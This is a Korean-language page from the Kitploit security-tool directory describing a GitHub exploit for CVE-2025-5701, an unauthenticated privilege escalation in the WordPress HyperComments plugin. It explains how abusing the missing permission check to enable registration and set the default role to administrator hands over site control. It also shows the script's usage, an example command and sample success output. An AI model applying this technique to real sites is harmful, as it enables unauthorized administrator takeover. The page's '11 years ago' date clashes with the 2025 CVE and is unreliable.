Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/nxploited/cve-2025-5701
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-5701

CVE-2025-5701

WordPress HyperComments 플러그인 <= 1.2.2는 권한 상승(Privilege Escalation)에 취약합니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-5701 - 인증되지 않은 권한 상승 익스플로잇

심각도: CRITICAL (CVSS 9.8)
영향을 받는 플러그인: WordPress용 HyperComments
영향을 받는 버전: ≤ 1.2.2


📌 취약점 요약

WordPress용 HyperComments 플러그인은 hc_request_handler 함수의 권한 검사 누락으로 인해 WordPress 옵션을 무단으로 수정할 수 있는 취약점이 있습니다. 이를 통해 인증되지 않은 공격자는 임의의 WordPress 옵션을 업데이트할 수 있습니다. 예를 들면 다음과 같습니다:

  • 사용자 등록 활성화 (users_can_register)
  • 새로 등록된 사용자에게 할당되는 기본 역할 변경 (default_role)

이를 함께 조합하면 공격자는 등록을 활성화하고 새로 등록되는 모든 사용자에게 자동으로 관리자(Administrator) 역할이 부여되도록 할 수 있습니다.


🧨 CVSS 점수

root@kitploit:~
CVSS v3.1: 9.8 CRITICAL  
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H

📦 사용법

root@kitploit:~
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)

usage: CVE-2025-5701.py [-h] -u URL

CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target base URL (e.g., http://target-site.com)

📦 예시

root@kitploit:~
python3 CVE-2025-5701.py -u http://target-site.com

💬 예시 출력

root@kitploit:~
CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit
By: Khaled Alenazi (Nxploited)

[+] Target is vulnerable (version: 1.2.2) - proceeding with exploitation.
[+] Exploit endpoint is accessible.
[+] Server response: {"result":"success"}
[+] Registration is now enabled. New users will be assigned administrator role.
[+] Register here: http://target-site.com/wp-login.php?action=register

Exploit by: Khaled Alenazi (Nxploited)

⚠️ 면책 조항

이 스크립트는 교육 목적으로만 제공됩니다. 허가 없이 시스템에 무단 접근하는 것은 불법적이고 비윤리적입니다. 통제된 환경 또는 명시적 승인을 받은 경우에만 사용하십시오.


Nxploited (Khaled_alenazi)

도구 다운로드